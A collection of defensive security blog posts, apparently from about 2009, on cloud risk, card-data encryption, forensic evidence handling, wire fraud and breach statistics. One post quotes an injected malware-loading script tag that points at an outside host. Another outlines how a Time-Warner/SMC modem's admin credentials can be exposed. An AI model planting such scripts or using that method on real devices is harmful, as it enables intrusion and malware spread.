Security

A Not-So-Great Use of Cloud Computing

As I’m sure you know, I’m not yet a big fan of “cloud computing,” known by various acronyms. I have yet to see a really comprehensive approach to audit and security. Ultimately, you don’t know where your data is in the “cloud.” And the Feds have access to it without a warrant.

So you can imagine my dismay when recently reading someone’s suggestion that the shared computing power of the “cloud” could be used to crack encryption algorithms ever so much faster. How will we address this risk?

The risks of audit and control issues, physical security and secure storage of backups, in my mind, outweigh the over hyped benefits. When I see a strong standard implemented by “cloud” vendors, subject to outside independent verification, I’ll get to wow.

Not until then. Where’s the beef?

Using Time-Warner as Your Internet Provider? Check Your Modem QUICKLY

As lf 10/20/09, a software maven has written of a major security hole (one you can drive a TRUCK through) in the wifi/cable modem models issued to customers who don’t want to use their own equipment.

Here’s the link, in all its’ details, by David Chen, writing up the vulnerability, which HAS been confirmed by Time-Warner. As of this writing, Time-Warner has no plans to change or resolve the vulnerability.

Here’s the quick version:

The modem: SMC8014 series cable modem/wifi router combination

Issue 1 : Time-Warner/SMC has the modem locked down in a default mode which is not accessible to the average user. The default configuration has a default username/password and has locked WEP as the wifi encryption with a standard SSID. (You might as well make the SSID: HACK_ME_I’M_EASY)

Issue 2: Admin access to the modem is disabled via Javascript. When David Chen disabled Javascript in his browser, he could see all the admin features, including something called “Backup Configuration File.”

Issue 3: The backup configuration file comes in a plain text file, which includes the admin ID and password. In plain text.

Issue 4: By default, the web admin interface is accessible from ANYWHERE on the internet. By running a simple port scan of Time Warner IP addresses, David Chen easily found dozens of these routers, open to attack.

So you KNOW that this since this has been picked up by Wired every knucklehead out there will be looking for these routers to play with.

The resolution to this mind-boggling issue that Time-Warner says they can’t do anything about?

Replace the modem - ASAP. And, complain, complain, complain.

End-To-End Encryption -Wouldn’t It Be Nice?

Since Heartland suffered a data breach (disclosed in January), they’ve become the poster child for end-to-end encryption. This is defined as encrypting card information from the moment it’s swiped until it reaches the card issuer. Of course, there may be some motivation provided by the fact that Heartland plans to sell a proprietary end-to-end encryption system by the end of this year. (Not sure I’d buy it from them!)

It sounds like a perfect solution, until you get into the mechanics. And that’s where the problems begin:

Hardware - Are all POS (Point of Sale) registers going to be able to handle the increased load of CPU cycles to encrypt and decrypt? It seems like all the vendors want you to use their hardware.

Software - Not all POS solutions are the same. What about companies that use registers AND online sales? Plus, there is currently no standard for what kind of encryption should be used. So you must go with a proprietary solution all the way through. How many companies can afford to replace so much materiel?

Location, location, location - Where does the data get stored? Can the database decrypt and re-encrypt? What about Call Centers, Fraud Management, or Marketing? They need to look at the information. Ultimately, where are the encryption keys stored and who/what has access to them?

Of the six vendors offering E2E, all of them require changes to POS systems.

And should this technology be implemented, it will not release businesses from complying with PCI. No, a report will still have to be delivered to the acquiring bank on an annual basis, signed by a C-level executive.

There’s no free lunch, it seems.

Things You Can Do to Help An Investigation

Sooner or later, you will be called upon, as an Admin or an Auditor, to assist or address a possible fraud or event pertaining to someone’s computer, laptop, pda or smartphone. People can be very anxious and over-react when an event is happening. Or, just as difficult, proceed to do nothing, because they’re not sure what to do.

Neither approach is truly helpful to investigating a forensic fraud, theft or other computer-related incident. I was asked to do an exam, a few years ago, of the hard drives of a CFO who had admitted to fraud and was fired. Her computer sat on her desk, and her secretary AND the company admin both logged into the computer over the course of weeks before we were engaged.

The problem? Every time someone logs in, files get changed. The secretary checked her email; the admin was checking something else. If the company had wanted to prosecute, the evidence on her hard drive was hopelessly muddied and would not have stood up in court.

Here’s the best idea: take the computer and LOCK IT UP. Don’t let it just sit there (so the defense attorney can point out anyone could have logged in) and don’t let people use it. Yes, we might use some volatile data in memory, but many times the computer is already turned off.

If events happen quickly, the fraudster leaves the building with/out access to his/her computer for the last time and it’s still running: LOCK IT UP. If it’s in an office, secure the office and don’t let anyone into it. If it’s in an open area, that’s when you’ll need to power it down and lock it up.

Will these rules fit every situation? Probably not. But they will fit 85%. If you know it’s going to be a forensic situation ahead of time, I hope management lines up someone to come in immediately, who can capture data from a live machine. But if not, and you’re first on the scene, the two rules above are the most important.

Who REALLY Owns Your Data

I had an up-close-and-personal experience today of “cloud computing.” It’s worth thinking about.

I had just finished reading Bruce Schneier’s essay on cloud computing, (which is a great read, by the way) and was considering the following point he recently penned in his Cryptogram:

As we move more of our data onto cloud computing platforms such as Gmail and Facebook, and closed proprietary platforms such as the Kindle and the iPhone, deleting data is much harder.

You have to trust that these companies will delete your data when you ask them to, but they’re generally not interested in doing so. Sites like these are more likely to make your data inaccessible than they are to physically delete it. Facebook is a known culprit: actually deleting your data from its servers requires a complicated procedure that may or may not work. And even if you do manage to delete your data, copies are certain to remain in the companies’ backup systems. Gmail explicitly says this in its privacy notice.

What if those companies delete your data because they don’t like it? Or some copyright is at issue and they “can’t” let you keep it, such as Amazon’s now notorious “removal” of the Orwell books due to copyright issues (How ironic is it that Orwell’s books were deleted???)

So, I’m logging into Skydrive this morning because I’m building an online collection of tools I can access when I’m on the road or someplace where I don’t have my computer or USB drives with me.

I’d uploaded about 3 gigs of tools, which might be considered by some to be “hacking” tools, including Cain and Abel, which (AV constantly tries to delete). But today, those directories and programs are nowhere to be found.

Big Brother Microsoft evidently doesn’t approve. And this is why we should all consider that if our data in the “cloud” doesn’t pass the vendor’s muster, our data will be deleted.

I’ll stick with my computer, for now.

New Aircrack Just Released

If you’re like me, you’re always hunting for the free tools out there you can add to your arsenal to keep (or in my case, test) the security of your network. Just out, a great addition to my toolset, is a new update to the well-known tool, aircrack-ng

Why have such a tool, used by the bad guys? Because it’s used by the bad guys to get into your network. It’s updated to crack more protocols, including WPA/PSK. It was one of the first tools to provide a way to crack WEP.

I have about three hundred tools in my toolkit, and only three of them are commercial tools. I’ve had to build a spreadsheet to keep up. I also use Backtrack running in VMWare. You can download VMWare’s free product, the VMWare Viewer, if you have an image (like Backtrack) you just want to run.

I also noticed, while on Vmware’s site, that you can download VMWare server for FREE. They’ll give you some serial numbers, and you can try out all sorts of tools in safety.

It’s good to know how things work.

Securing ALL Your Web Services

A number of commentators, notably IBM’s Kris Lamb, have reported that malicious code is no longer limited, for the most part, to p0rn and other sleazy websites. Hackers are targeting the more commonly used education, healthcare, blogging and small ecommerce websites where they can come in and insert hostile code which will forward the user’s browser to download malware.

“We’ve reached a tipping point where every website should be viewed as suspicious and every user is at risk,” Lamb said in a statement. “The threat convergence of the Web ecosystem is creating a perfect storm of criminal activity.”

The primary mode of attack appears to be SQL Injection, which still remains vulnerable because coding user input on a website correctly is technically challenging. So the bad guys hack in, drop a script such as :

“script src=http://a0v.org/x.js”

And it runs every time someone visits the page, silently installing malware in the background.

If you run a query in Google, around 60,000 websites have this embedded in their page code. Needless to say, don’t visit any of them. I used Google to check the three websites I support via the “site:” search function. You can, too.

What to do? Use some freeware or shareware to do an initial scan for vulnerabilities. Scan your web pages for odd looking script sources. If you find them, you’ll know your web code is vulnerable somewhere. Set about finding where in a hurry, because the bad guy, or some other bad guy will find it again.

Next, take a look at anything else coming in through your firewall: FTP, email and terminal services/Citrix. Consider any opening a vector for attack, even if you have locked down the external IP
sources. Watch the logs carefully and daily.

Finally, watch outbound connections for known sites, such as the one above. Keep your ear out on security sites for the latest of those, and block connections to them from your firewall until they can be shut down.

More work, of course, but much LESS work than a successful attack!

Small Business is Being Targeted

The days when you could assume that because your company was so small hackers wouldn’t care, have officially gone past. Security by obscurity has passed as well. Now the thieves are looking for small businesses so they can get to the banking accounts and wire money.

I was called on one of these last spring, and it worked like this: the controller got a call from the bank (someone was watching! Yay!) about some wired fund transfers that looked suspicious. After reviewing them, the controller realized fraud and theft had occurred. Other evidence was that the thief had changed the email address back to the controller so that she/he would receive no notification of the wire transfers. It seemed pretty clear that someone had somehow gotten her/his access to the bank account. That was all that could be discovered at the time. They lost over $40,000. That’s small change compared to some of the fraud going on.

Reading an article from the Washington Post, I recognized the scam. It works like this:

“In many cases, the scammers infiltrate companies in a similar fashion: They send a targeted e-mail to the company’s controller or treasurer, a message that contains either a virus-laden attachment or a link that — when opened — surreptitiously installs malicious software designed to steal passwords. Armed with those credentials, the crooks then initiate a series of wire transfers, usually in increments of less than $10,000 to avoid banks’ anti-money-laundering reporting requirements.”

Sounds like exactly what happened to my client. The bad news is that once that money is wired out, there is no way the company can get it back. Losses to small businesses are becoming significant, but have not gotten much press up until this point.

In fact, wire-transfer fraud has gone up 58% in 2008, according to the US Treasury Department. Commercial business customers only have about two days to notify the bank of fraud, and then they eat the loss.

The problem is, Anti-Virus software is not keeping up with malware coming from over the Internet. Thieves are able to use malware to capture even the one-time codes on a fob during a transaction.

An advisory issued by the Financial Services Information Sharing and Analysis Center, recommends that commercial banking customers take some fairly rigorous steps to secure their online banking accounts. For example, the group recommends that commercial banking customers “carry out all online banking activity from a standalone, hardened, and locked-down computer from which e-mail and Web browsing is not possible.”

Another option might be VMware, where an image could be loaded for banking use only.

By the Numbers

I was reading through the list of 2009 reported data breaches/identity theft/etc over on Identitytheft.Info and pondering the patterns that might be visible with a little help of sorting/filtering in Excel.

Part of the problem is that there is no one complete source for gaining hard numbers on medical identity theft, identity theft, data breaches, lost, stolen, etc. Every tracking organization orders their data differently. But just for grins, let’s take this one web page sited above, as a source for analysis, and drop it into a spreadsheet.

Between January 2009 and August 18, there is a total of 237 incidents. Without any further analysis, say to numbers of people/records exposed, we can draw some interesting conclusions:

58 of those incidents involved theft by owners or employees (about one quarter)
52 happened due to hacked networks, servers or PCs
44 happened due to lost, missing or stolen computer equipment containing PII or CC#
32 were due to paper documents in trash (looked in YOUR dumpster lately?)
21 were due to Web or email exposure - i.e., poor custodian security practices
10 were due to Skimming via CC # or ATMs (including some employee & owners)

There were about 20 that defied this simplistic categorization - my favorite was “patient records left on train.”

The first group (58) interested me greatly; it shows the impact (IMHO) of our economy, and, perhaps, the growing awareness on a public level that credit card numbers and personal data are now worth stealing.

The second one I find fundamentally clueless, because there are excellent whole disk encryption products that are FREE.

I was tempted to combine 52 and 21, but refrained simply because there are zero-day exploits out there.

The most appalling, are, of course, the data dumpster droppers. The good news is that there are now data dumpster dropper divers. (Sorry, I couldn’t help it.) At least somebody is looking in dumpsters for this kind of information now. That’s a Good Thing. Anyone who puts that kind of information in the trash should be handcuffed to a shredder, don’t you think?

Points to Ponder: Reviewing the “SoupNazi” Activities

By now I’m sure you’ve heard that Albert Gonzalez is being charged with the attacks on Hannaford, Heartland, 7-Eleven, etc. In between all the excited reporting, are some points that admins and auditors ought to pay attention to. We ought to ponder how this attack is different from attacks in the past, and why this attack was so successful.

1. Using a “team.” Most of his team have not been captured, residing as they may somewhere overseas. Using a multiple talent set across several different technical approaches increases the chances of success. This is becoming more and more common, especially with ATM break ins.

2. They used SQL-injection attacks. This isn’t new, but all of these folks were having quarterly scans from external vendors as part of PCI compliance. Why didn’t the scans catch the injection vulnerabilities? Makes you want to take another look at the scanning company you may be using, doesn’t it?

3. They broke in via wireless. Anyone still using WEP out there - it’s now trivial to crack the protocol, and someone will certainly do it if you offer it up.

4. There’s a big market for those credit cards and the people that can get to them. Over 130 million cards made him a LOT of money.

And we still don’t know “exactly” how he was caught, do we?